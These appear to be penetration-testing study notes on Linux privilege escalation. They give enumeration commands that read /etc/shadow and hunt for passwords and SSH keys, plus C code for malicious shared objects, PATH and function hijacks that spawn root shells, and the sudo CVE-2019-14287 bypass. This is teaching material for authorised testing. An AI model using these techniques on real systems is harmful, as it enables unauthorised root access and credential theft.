Linux privilege escalation

Notes for privilege escalation on Linux. Some of these notes are based on the Linux Privilege Escalation for Beginners course by TCM Academy, which is part of the Practical Network Penetration Tester (PNPT) certification.

Other resources

• g0tmi1k: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md
• Sushant 747's guide: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

Automated tools

• LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
• LinEnum - https://github.com/rebootuser/LinEnum
• Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester
• Linux Priv Checker - https://github.com/sleventyeleven/linuxprivchecker

Enumeration

System enumeration
Hostname

hostname

Kernel

uname -a

Processes running

ps -aux

User enumeration

whoami
id

Commands that can be run as sudo

sudo -l

List of users

cat /etc/passwd | cut -d : -f 1

List of users and hashed passwords

cat /etc/shadow

Network enumeration
IP address

ifconfig

ip a

Open ports

netstat -ano

Routes

route

ip route

ARP

arp -a

ip neigh

Password hunting
Find word password on files

grep --color=auto -rnw '/' -ie 'PASSWORD' --color=always 2>/dev/null

find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

Find SSH files

find / -name id_rsa 2>/dev/null

find / -name authorized_keys 2>/dev/null

Sudo

Shell escaping
Having access to execute binaries as sudo without password, can be abuse to get a root shell.

sudo -l

Check GTFOBins for a list of binaries that can be abused.

Intended functionality
If the binary cannot be used to get a root shell, we can search for functionalities of that binary that can give us some root privileges.

LD_PRELOAD
If LD_PRELOAD is enabled, we can use it to load a malicious file before executing a binary with sudo.
Example of malicious file

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init(){
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/bash");
}

Compile file:

gcc -fPIC -shared -o <file>.so <ofile>.c -nostartfiles

Execute binary preloading the malicious file:

sudo LD_PRELOAD=<path-to-file>/<file>.so <binary>

CVE-2019-14287

On sudo versions < 1.8.28, if you are explicitly denied using sudo as root, you can get around this restriction and execute commands as root.

Check for the following output:

sudo -l
User <user> may run the following commands on sudo-privesc:
    (ALL, !root) NOPASSWD: /bin/bash

If we set the UID to -1, it would read it as a 0 (UID of root user).

Exploitation:

sudo -u#-1 /bin/bash

SUID

If a binary has the SUID set, that binary can be executed as root. Therefore, that binary can be used to escalate privileges.

Look for binaries with SUID set.

find / -perm -u=s -type f 2>/dev/null

Share Object Injection

If a binary is trying to load a share object that doesn't exists, we can place a malicious share object to execute code as root.

find / -type f -perm -04000 -ls 2>/dev/null

Look for SOs not found on a binary.

strace /path/to/binary | grep "open|access|no such file"

After identifying a share object that is not found on a directory we can write to; we can write and compile a malicious file.
Malicious file to spawn root shell.

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
        setuid(0);
        setgid(0);
        system("/bin/bash -p");
}

Compile

gcc -shared -fPIC -o /path/to/output/file /path/to/file.c

Execute binary to get root shell.

Nginx binary symlinks

If the www-data user has SUID on Sudo command and nginx <= 1.6.2 is installed, a vulnerability in nginx can be abused to escalate privileges to root.
The vulnerability is related to overly permissions over the log files

Check log files permissions

ls -la /var/log/nginx

If www-data has rwx permissions over the logs folder, the vulnerability can be abused.
Exploit: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

ENV Variables

If a binary that has SUID enabled, is executing another binary without using absolute path, we can add a path to the PATH variable and execute a malicious file as root.

Add path to PATH variable.

export PATH=/path:$PATH

On liner to spawn a root shell.

int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}

Compile

gcc /path/to/file.c -o /output/file

Execute binary with SUID to get root shell.

Malicious function
If the binary is executing another binary using absolute path, we can create a malicious function that will be executed instead of the actual binary.

Create function

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p;}

Export function

export -f /usr/sbin/service

Execute binary to get root shell.

Capabilities

At a high level, capabilities are similar to SUID meaning you can execute binaries as root.

Get capabilities:

getcap -r / 2>/dev/null

If there's a binary with capabilities and with 'ep' (Effective permitted), there's a chance that the binary can be abused for privilege escalation.

NFS root squahing

If there's a mount with root squashing disabled, that folder can be mounted to add root executables and escalate privileges.

List mounts

cat /etc/exports

Check for folder with no_root_squash.

Mount that NFS from attacker machine

sudo mount -o rw,vers=2 <dest_ip>:/<nfs-folder> <local-folder>

Other

Get full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'